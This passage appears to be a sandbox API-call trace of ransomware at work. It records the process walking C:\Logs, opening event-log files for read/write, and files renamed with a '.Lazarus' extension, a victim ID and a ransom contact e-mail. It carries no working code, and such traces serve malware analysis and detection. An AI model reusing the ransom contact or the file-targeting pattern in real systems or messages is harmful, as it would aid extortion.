hHeap=0x20000) returned 1 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0087.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0087.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.724] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x8db03ffb, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cAlternateFileName="SECURI~1.LAZ")) returned 1 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ced8 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81ed8 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0087.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0087.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81ed8 | out: hHeap=0x20000) returned 1 [0087.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0087.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0087.725] AreFileApisANSI () returned 1 [0087.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", lpUsedDefaultChar=0x0) returned 84 [0087.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0087.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0087.725] AreFileApisANSI () returned 1 [0087.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0087.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f798 [0087.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=84 | out: lpWideCharStr="C:\\Logs\\Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 84 [0087.725] CreateFileW (lpFileName="C:\\Logs\\Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\security.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.725] GetFileType (hFile=0x424) returned 0x1 [0087.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0087.726] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.726] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.726] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.726] CloseHandle (hObject=0x424) returned 1 [0087.726] AreFileApisANSI () returned 1 [0087.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0087.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x60088 [0087.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=84 | out: lpWideCharStr="C:\\Logs\\Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 84 [0087.726] CreateFileW (lpFileName="C:\\Logs\\Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\security.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.727] GetFileType (hFile=0x424) returned 0x1 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0087.727] CloseHandle (hObject=0x424) returned 1 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c500 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.728] AreFileApisANSI () returned 1 [0087.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0087.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x604a8 [0087.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x604a8, cchWideChar=84 | out: lpWideCharStr="C:\\Logs\\Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 84 [0087.728] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Security.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\security.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x8db03ffb, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x111000)) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.728] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.728] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.728] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Setup.evtx", cAlternateFileName="SETUP~1.EVT")) returned 1 [0087.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0087.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0087.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0087.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0087.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0087.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.729] AreFileApisANSI () returned 1 [0087.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Setup.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Setup.evtx", lpUsedDefaultChar=0x0) returned 19 [0087.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.729] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0087.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.729] AreFileApisANSI () returned 1 [0087.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0087.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7abd8 [0087.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x7abd8, cchWideChar=19 | out: lpWideCharStr="C:\\Logs\\Setup.evtx") returned 19 [0087.729] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.730] GetFileType (hFile=0x424) returned 0x1 [0087.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7abd8 | out: hHeap=0x20000) returned 1 [0087.730] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.730] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.730] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.730] CloseHandle (hObject=0x424) returned 1 [0087.730] AreFileApisANSI () returned 1 [0087.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0087.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7ac98 [0087.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x7ac98, cchWideChar=19 | out: lpWideCharStr="C:\\Logs\\Setup.evtx") returned 19 [0087.731] CreateFileW (lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.731] GetFileType (hFile=0x424) returned 0x1 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac98 | out: hHeap=0x20000) returned 1 [0087.731] CloseHandle (hObject=0x424) returned 1 [0087.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0087.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0087.731] AreFileApisANSI () returned 1 [0087.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x26) returned 0x7aa58 [0087.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x7aa58, cchWideChar=19 | out: lpWideCharStr="C:\\Logs\\Setup.evtx") returned 19 [0087.732] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7aa58 | out: hHeap=0x20000) returned 1 [0087.732] AreFileApisANSI () returned 1 [0087.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0087.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 